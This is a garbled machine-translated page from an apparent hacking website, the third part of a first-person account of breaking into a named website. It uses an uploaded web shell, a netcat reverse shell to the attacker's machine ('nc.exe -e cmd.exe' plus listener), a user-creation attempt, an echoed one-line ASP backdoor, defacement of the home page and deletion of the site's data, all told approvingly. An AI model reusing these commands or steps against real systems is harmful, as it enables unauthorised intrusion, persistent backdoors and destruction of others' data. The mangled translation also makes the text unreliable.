Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > hacker invade > Content
Hot Articles
Invades Dong Yanni the i
MS08-067 introduces the
The local area network i
Invades RedHat the Linux
Invades the Turkish webs
Manual injection ASP scr
The RPC crack invades
The study contains the c
The SNORT invasion exami
Simulates the intruder t
Invades the chinalinux s
Invades the Linux operat
Invades in the process t
PHP pours into the invas
Brief analysis Linux sys
Recommend Articles
Manual injection ASP scr
Simulates the intruder t
Invades the chinalinux s
The local area network i
Invades the Linux operat
Invades in the process t
Invades once more using
Invades the WINDOWS serv
PHP pours into the invas
Brief analysis Linux sys
Invades the Turkish webs
Invades RedHat the Linux
Buffer overflow analysis
Invades the Linux system
The study contains the c
New Articles
The network invasion exa
php crack principle
Invades the BBSXP forum
Invades the BBSXP forum
Invades the Chinese DJ C
Invades CISCO (chart)
A common Linux invasion
Facebook wins USD 873 mi
jpchina_2008
The perfect version scri
Some invasion experience
Using others procedure t
The example demonstrates
How teaches you to invad
How teaches you to invad
Invades the swindler to stand the xuehk.com entire process (chart£©(3)
  Add date: 10/08/2008   Publishing date: 10/08/2008   Hits: 1
Total 3 pages, Current page:3, Jump to page:
 




After uploading good cmd.exe, in I wrote a moment ago in the cmd.asp script's code changes “cmd.exe” “C:\Program Files\free3web ~ \ cmd.exe”, as soon as attempted is carrying out has issued a decree, discovered that carried out successfully! Looked like does not need to use the Wscript executive command, as shown in Figure 5.
 


Orders with dir to want to examine the F plate's document, but does not have the jurisdiction, was really dies melancholy I, could the executive command but not use the value, therefore I prepared on-line to look up some to propose the power about the server the article, had a look at others to propose the power mentality. Who knows me to see accidentally to one about webshell under the nc bounce's jurisdiction discussion, has watched the discussion, after carefully knew originally the shell jurisdiction which bounces with nc is the webshell jurisdiction is higher than! Therefore I have made I exempt have killed nc immediately to the server on, in local opens cmd, the input order “nc - vv - l - p 2006”, then inputs “c:\Program ~ \ freeweb \ nc.exe - e c:\Program ~ \ freeweb \ cmd.exe in webshell my IP 2006”, a while nc had responded, I attempted the executive command “net user aa the aa /add”, the result defeat, proved that the jurisdiction was not system, but when I used the order “the dir F:\wwwroot\xuehk\wwwroot\” time, succeeded unexpectedly has listed xuehk.com website all documents, as shown in Figure 6.
 

         
Then I try to order with echo to write a document in xuehk.com, the input
  echo H4cked the by fallen leaf fluttered about the >luoye.txt success to read in the xuehk.com website root directory, as shown in Figure 7.



Now comes a echo a few words wooden horse! Input
  echo ^execute request^ (“l " ^) the ^>luoye.asp success reads in luoye.asp, but because the server shielded asp to debug the wrong information, therefore opened time luoye.asp returned the page was 500 internal errors, but this did not affect a few words wooden horse's use, after I used lake2 a few words wooden horse client side company joined xuehk.com a few words wooden horse, with it “Edit TextFile” the function xuehk.com home page document index.asp replaces the black page, and in shell which, in nc bounced its data deletes completely, was also for them a small lesson! Generally speaking, this invasion's goal achieved.


 
Other pages: : <<Prev * 1 * 2 * 3
Prev:Shuts off the way which from the registry all hackers invade Next:Conversation of the non-mainstream invasion kidnaps winnt/2k HASH

Comment:

Category: Home > hacker invade
Home